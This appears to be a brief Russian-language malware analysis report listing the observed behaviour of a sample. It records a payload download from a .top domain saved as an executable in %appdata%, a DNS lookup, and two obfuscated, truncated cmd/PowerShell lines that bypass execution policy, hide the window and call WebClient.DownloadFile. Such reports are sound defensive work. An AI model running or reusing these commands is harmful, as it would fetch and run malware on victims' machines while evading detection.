Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^WE^R^She^L^l^.E^Xe^ -ex^E^cU^T^i^o^N^poL^IcY^ BY^P^a^ss -^no^p^rOf^ilE ^-WIndowstylE hIDDen (^ne^w-oBjecT ^sY^stEm.^NE^T.^W^e^B^ClI^ENT^)^.Dow^NLOaDfI^LE('http://newyeargoka...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "p^o^WE^R^She^L^l^.E^Xe^ -ex^E^cU^T^i^o^N^poL^IcY^ BY^P^a^ss -^no^p^rOf^ilE ^-WIndowstylE hIDDen (^ne^w-oBjecT ^sY^stEm.^NE^T.^W^e^B^ClI^ENT^)^.Dow^NLOaDfI^LE('http://newyeargoka...' (со скрытым окном)